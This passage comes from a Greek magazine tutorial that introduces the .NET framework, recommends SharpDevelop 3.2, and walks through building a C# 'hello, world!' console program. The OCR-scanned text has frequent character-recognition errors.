κονσόλα). Εκεί τυπώθηκε το αναμενόμενο μήνυμα ;) 
ΝΕΤ και διευκολύνει τον προγραμματισμὀ σε αρκετὲς γλὠσσες (Visual Basic .NET, 
C++, Boo, F#, IronPython και IronRuby). Μπορείτε να κατεβάσετε To SharpDevelop 
ano τη δικτυακἠ του κατοικία, στη διεύθυνση www.icsharpcode.net/OpenSource/SD. 
Το περιβάλλον εργασἰας του IDE παραμένει σταθερό σε ὁλες τις εκδόσεις. Οι diab- 
σιµες επιλογὲς διαφέρουν μόνο ως προς την υποστηριζόμενη ἐκδοση του «ΝΕΤ και 
τις αντίστοιχες δυνατότητες. Αν θέλετε να γράφετε εφαρμογές που θα τρέχουν στο 
μεγαλύτερο ποσοστὀ των συστημάτων και χωρίς να απαιτούν κἀποια νέα ἐκδοση 
του «ΝΕΤ, θα σας προτείναμε να κατεβάσετε το SharpDevelop 3.2. H συγκεκριμένη 
ἐκδοση του IDE υποστηρίζει τα .NET 2.0, 3.0 και 3.5, ano Ta onoia το τελευταίο 
εἶναι εγκατεστημένο στη συντριπτική πλειονότητα των συστηµάτων µε Windows. 
Εξάλλου, η συγκεκριμένη ἐκδοση του SharpDevelop εἶναι αρκετά ελαφριά και εἶναι 
ιδανικἠ ακόµα και για το πιο αργό σύστημα”. Πάντως, αν θέλετε να απολαύσετε OAEG 
τις δυνατότητες Tou SharpDevelop και του νεότερου «ΝΕΤ framework, δεν έχετε 
παρά να κατεβάσετε την πιο πρόσφατη ἐκδοση. 


Hello .NET 


Όπως καταλαβαίνετε, μετὰ απὀ την ακατάσχετη φλυαρία των αρχικών συστάσεων 
EXE] φτάσει η ώρα να γράψουμε την πρώτη µας εφαρμογή. Ακολουθώντας την napa- 
δοση, το πρὀγραμμἁ µας θα εμφανίσει στην κονσόλα το μήνυμα "hello, world!". =e- 
κινάμε avoiyovtac το SharpDevelop και επιλέγουμε το "New solution", ano το κουμπί 
που εμφανίζεται στην αρχικἠ οθόνη του IDE. Ano το νέο παράθυρο που εμφανίζεται 
μπορούμε να επιλέξουμε το εἶδος του project, καθὼς και τη γλῶσσα προγραμματι- 
σμού που σκοπεύουµε να χρησιμοποιήσουμε. Εμεὶς διαλέξαμε τη C# κι αφού κάναμε 
κλικ στην κατηγορία "Windows Applications", and τις επιλογές που εμφανίζονται 
στα δεξιὰ διαλέξαμε το "Console Application". Αμέσως μετά, and το χαμηλότερο 
τμήμα του παραθύρου δηλώνουμε το επιθυμητὀ ὀνομα για την εφαρμογή, καθώς και 
τη διαδρομή ὁπου θέλουμε να αποθηκευτούν τα αρχεία µε τον κὠδικα. Πατώντας 


3. Αυτό το τονίζουµε για ὁσους τρέχουν Windows µόνο σε EIKOVIKEG μηχανές ;) 
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το κουμπἱ ΟΚ περνάμε πάλι στο περιβάλλον epyaoiac Tou IDE. Εκεί, ως δια μαγείας 
θα ἐλεγε κανείς, βλέπουμε OT! ο editor περιλαμβάνει Non Eva απόσπασμα κὠδικα, 
το οποίο μπορεί να λειτουργήσει ως βάση για Eva νὲο πρὀγραμμα. Στην περἱπτωσήἠ 
μας, ὁπου αποσκοπούµε απλά στην εμφάνιση ενὸς σύντομου μηνύματος, δεν θα 
χρειαστεί να γράψουμε και πολλά. Πα την ακρίβεια, αρκεί να κάνουμε μερικὲς μόνο 
απλὲς τροποποιήσεις, τις οποίες εἰμαστε σίγουροι ὁτι δεν χρειάζεται να περιγράψου- 
με. Πα τη μεταγλώττιση και την εκτἐλεση του προγράμματος αρκεἰ να πατήσουμε TO 
πλήκτρο [F5] ἡ το κουμπί µε το πράσινο βελάκι, που δεσπόζει στη μπάρα εργαλείων 
(toolbar) του IDE. 


Όπως καταλαβαίνετε, ὁσα εἶπαμε μέχρι στιγµἠς δεν εἶναι παρἀ μόνο µια μικρὴ KI 
εξαιρετικἁ σύντομη εισαγωγἠ. Δεν ξέρουμε αν καταφέραμε να σας πείσουµε για την 
αξία του «ΝΕΤ, αλλά θέλουμε να πιστεύουμε ὁτι σας ανοἰξαμε την ὀρεξη για νέους 
πειραματισμούς και κυρίως για προγραμματισμὀ. Αν συνεχίσουμε, όμως, εἶναι πολὺ 
πιθανὸ να μας βρει ο νέος χρόνος πατώντας πλήκτρα. Κάπου εδὠ θα κλείσουμε αυτὸ 
το πρῶτο ἀάρθρο, µε την υπόσχεση OT! θα επανέλθουµε και θα εμβαθύνουμε στον 
προγραμματισμὸ HE τη CE. 


Ένα μπλοκ διάγραμμα µε τις λει- 
τουργἱες και τις δυνατότητες που 
προσθέτει κάθε νέα ἐκδοση του .NET 
framework! 
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The .NET Framework Stack 
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